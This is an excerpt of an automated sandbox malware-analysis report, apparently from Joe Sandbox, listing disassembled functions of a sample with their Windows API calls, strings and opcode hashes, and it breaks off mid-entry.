                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 9d40741012117a390642188ae884810fd3586ab0d6b1569426f706557f75e070
                                                            • Instruction ID: 37d0c9a6c0f447de4feff3e9127689e2b74e64009824c88346010e194b120965
                                                            • Opcode Fuzzy Hash: 9d40741012117a390642188ae884810fd3586ab0d6b1569426f706557f75e070
                                                            • Instruction Fuzzy Hash: 36F0CD36744511A7D25533347C0ABAB26A7DFC3720F210114FA19F6393EF79DD415962
                                                            Function 0005EC0B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005EC17
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005EC31
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005EC42
                                                            • TranslateMessage.USER32(?), ref: 0005EC4C
                                                            • DispatchMessageW.USER32(?), ref: 0005EC56
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005EC61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: 9046cd4563fe1bb44164c67953c20773aedc57ccaf1e6c7c341baaf18dad85d1
                                                            • Instruction ID: 98d55fdef77bf44d8ad3107e14a4e7eeaeb48340039f450a7f27e1f6d2aa9cfc
                                                            • Opcode Fuzzy Hash: 9046cd4563fe1bb44164c67953c20773aedc57ccaf1e6c7c341baaf18dad85d1
                                                            • Instruction Fuzzy Hash: 19F03C72A01629BBDB206BA5DC4CDDF7F7DEF42392B004411BA4AE2051D638D54AC7E0
                                                            Function 0004D4B2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 0004CD3C: _wcsrchr.LIBVCRUNTIME ref: 0004CD53
                                                            • _wcslen.LIBCMT ref: 0004D584
                                                            • _wcslen.LIBCMT ref: 0004D5CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 53c84e556ac45cb2746cecdbd3f1065be256309b61271733f17cc899d51fb1cf
                                                            • Instruction ID: bfae16b8f8d6ec19bb7c89f2b7de6a93b99b74c939e08cebbf79a57e03e87c0f
                                                            • Opcode Fuzzy Hash: 53c84e556ac45cb2746cecdbd3f1065be256309b61271733f17cc899d51fb1cf
                                                            • Instruction Fuzzy Hash: BA4138B1900710A6D7716F348856ABFB3F8EF40744B14892FF9868B182EB609D45C35D
                                                            Function 0005DE49 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 0005DE5F
                                                              • Part of subcall function 0004CA80: _wcslen.LIBCMT ref: 0004CA86
                                                            • _swprintf.LIBCMT ref: 0005DE93
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • SetDlgItemTextW.USER32(?,00000066,00092892), ref: 0005DEB3
                                                            • EndDialog.USER32(?,00000001), ref: 0005DFC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 84271fae031f205bb1e51fc7a245f6d156010d420444b3e658f683f1c7be611d
                                                            • Instruction ID: 313252eac45e200d5622b222b43627c3a08dce29fd1082098519b6d1eaeb555a
                                                            • Opcode Fuzzy Hash: 84271fae031f205bb1e51fc7a245f6d156010d420444b3e658f683f1c7be611d
                                                            • Instruction Fuzzy Hash: 89417FB1900258AADF659B60CC45EEF77FCEB04342F4080A7BD09E7052EF749A888F61
                                                            Function 0004CF12 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0004CF36
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0004B4E5,?,?,00000800,?,?,0004B4AA,?), ref: 0004CFD4
                                                            • _wcslen.LIBCMT ref: 0004D04A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: 68fdf9b9e9821ad4983ab0c139277c98ee0ed31a15d67af9233601b118f75f43
                                                            • Instruction ID: 9bfae91e74627bbd84343fe12bc525559539cc20d90a6d7ac74f1dee8ed5f829
                                                            • Opcode Fuzzy Hash: 68fdf9b9e9821ad4983ab0c139277c98ee0ed31a15d67af9233601b118f75f43
                                                            • Instruction Fuzzy Hash: D74103B1940219B6CF61AF70CC05FEF73A9AF05381F008476F918A7052EB749949CA68
                                                            Function 0005C76D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 0005C77D
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0005C7A2
                                                            • DeleteObject.GDI32(00000000), ref: 0005C7D4
                                                            • DeleteObject.GDI32(00000000), ref: 0005C7F7
                                                              • Part of subcall function 0005B6A2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C7CD,00000066), ref: 0005B6B5
                                                              • Part of subcall function 0005B6A2: SizeofResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6CC
                                                              • Part of subcall function 0005B6A2: LoadResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6E3
                                                              • Part of subcall function 0005B6A2: LockResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6F2
                                                              • Part of subcall function 0005B6A2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B70D
                                                              • Part of subcall function 0005B6A2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B71E
                                                              • Part of subcall function 0005B6A2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B787
                                                              • Part of subcall function 0005B6A2: GlobalUnlock.KERNEL32(00000000), ref: 0005B7A6
                                                              • Part of subcall function 0005B6A2: GlobalFree.KERNEL32(00000000), ref: 0005B7AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                            • String ID: ]
                                                            • API String ID: 1428510222-3352871620
                                                            • Opcode ID: 552d29c2974ec0e96f58b30d20120fcf64aae31fe15e35c0e265084309d2a24f
                                                            • Instruction ID: 9f1654d0aed7ff9fee782327578e6edf2874577b581579121766af09fa2ed2b4
                                                            • Opcode Fuzzy Hash: 552d29c2974ec0e96f58b30d20120fcf64aae31fe15e35c0e265084309d2a24f
                                                            • Instruction Fuzzy Hash: 5101D236580B05ABE71127648C09EBF7ABEAFC5B53F140010FD00B7292EF759C0D8AA0
                                                            Function 0005E5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005E61B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0005E631
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005E645
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 0005E654
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: fe6b934fb2cd53ee09d524c94e32e10dd37fe24738dfe2b032a9550eba7c68c5
                                                            • Instruction ID: 13830e8d0f91ba5d4e6ea2a750855a10b46ff0981b3c421af6fff8ffcaf42c7f
                                                            • Opcode Fuzzy Hash: fe6b934fb2cd53ee09d524c94e32e10dd37fe24738dfe2b032a9550eba7c68c5
                                                            • Instruction Fuzzy Hash: 92012832780B507BE1254B64DC09FAB77ADFB6B7C3F004401F781A60D0C6A65A09C779
                                                            Function 00069085 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00069036,?,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002), ref: 000690A5
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000690B8
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00069036,?,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002,00000000), ref: 000690DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: eea930c519bd31e923dd3fa52d1d758d502aba2b0bd1b04292bc054a204548d1
                                                            • Instruction ID: 19db401786dccd9ffbe70437747e394d52952885fbd2374de48ded0caaaed7e5
                                                            • Opcode Fuzzy Hash: eea930c519bd31e923dd3fa52d1d758d502aba2b0bd1b04292bc054a204548d1
                                                            • Instruction Fuzzy Hash: A8F0AF30E00208BFEB519BA4DC09B9EBFB9EF04711F004064F909A2161CB785E91CA90
                                                            Function 00050600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00051B14: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                              • Part of subcall function 00051B14: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005061F
                                                            • GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005062F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
                                                            • Instruction ID: dff707dbc469262df8c65d8fa0593b5a37fe9b1060feac3165a6deed42d1ff62
                                                            • Opcode Fuzzy Hash: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
                                                            • Instruction Fuzzy Hash: 5EE04F70D857419EE7605F749808B877ED45B24712F01C81DA68D97152D7BCD884CB94
                                                            Function 00063BBA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: dba8f870a75fe8c328a6054a9cc72c25df116853d152323c8c56ad0877ee1f39
                                                            • Instruction ID: 5fa0d58475889755910c93b95617e9c3fe4dc4f532042cf6182d26f71e3650fb
                                                            • Opcode Fuzzy Hash: dba8f870a75fe8c328a6054a9cc72c25df116853d152323c8c56ad0877ee1f39
                                                            • Instruction Fuzzy Hash: 0D51E375A006029FDB298F14D851BAA77E7EF44320F24452DFD0667292DB71EE91CBD0
                                                            Function 0006CF40 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0006CF49
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CF6C
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CF92
                                                            • _free.LIBCMT ref: 0006CFA5
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CFB4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 6e3710fff46d6aa37b84cfbe55a20ef5d16295f5781010e16732d46848ff619b
                                                            • Instruction ID: e625e4cb7aac5444b940ee255dc756dbae742f632ef2c49135cdb436b9a7f9b5
                                                            • Opcode Fuzzy Hash: 6e3710fff46d6aa37b84cfbe55a20ef5d16295f5781010e16732d46848ff619b
                                                            • Instruction Fuzzy Hash: A9015E72A05615BF322167B65C4CC7BAAAFEFC6BA03140139BD4CD6201EF698C4295B0
                                                            Function 0006A3E9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,0006A640,0006C198,?,0006A393,00000001,00000364,?,0006524D,?,?,000830C4), ref: 0006A3EE
                                                            • _free.LIBCMT ref: 0006A423
                                                            • _free.LIBCMT ref: 0006A44A
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A457
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A460
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 2a23b074cb55388feee8eb008535b21e2a292817d92049e542297489627409f8
                                                            • Instruction ID: 8a1ff7e426686cbe727741d014cda72f34d40a729e9999de94c3f809099a6806
                                                            • Opcode Fuzzy Hash: 2a23b074cb55388feee8eb008535b21e2a292817d92049e542297489627409f8
                                                            • Instruction Fuzzy Hash: A601F932B4060167E22133746C8EA6B26ABDFC33607204024FB15F2163EFB88C015963
                                                            Function 000521E6 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000524BF: ResetEvent.KERNEL32(?), ref: 000524D1
                                                              • Part of subcall function 000524BF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000524E5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0005221A
                                                            • CloseHandle.KERNEL32(?,?), ref: 00052234
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 0005224D
                                                            • CloseHandle.KERNEL32(?), ref: 00052259
                                                            • CloseHandle.KERNEL32(?), ref: 00052265
                                                              • Part of subcall function 000522DC: WaitForSingleObject.KERNEL32(?,000000FF,000523F9,?,?,0005246F,?,?,?,?,?,00052459), ref: 000522E2
                                                              • Part of subcall function 000522DC: GetLastError.KERNEL32(?,?,0005246F,?,?,?,?,?,00052459), ref: 000522EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 76dccda88ec331ed11ca32c2408017cb382e2a3733e3ddef7bdc9c4c04fbfd70
                                                            • Instruction ID: 14fbd0a49271695eb18397b4568e5e1c82bb4774e6041cfdaa94e828d3973eac
                                                            • Opcode Fuzzy Hash: 76dccda88ec331ed11ca32c2408017cb382e2a3733e3ddef7bdc9c4c04fbfd70
                                                            • Instruction Fuzzy Hash: D9018876500744EFD722AF64DC84BC6BBA9FF08711F004929F36E62161C7797994CB94
                                                            Function 0006D80F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0006D827
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006D839
                                                            • _free.LIBCMT ref: 0006D84B
                                                            • _free.LIBCMT ref: 0006D85D
                                                            • _free.LIBCMT ref: 0006D86F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
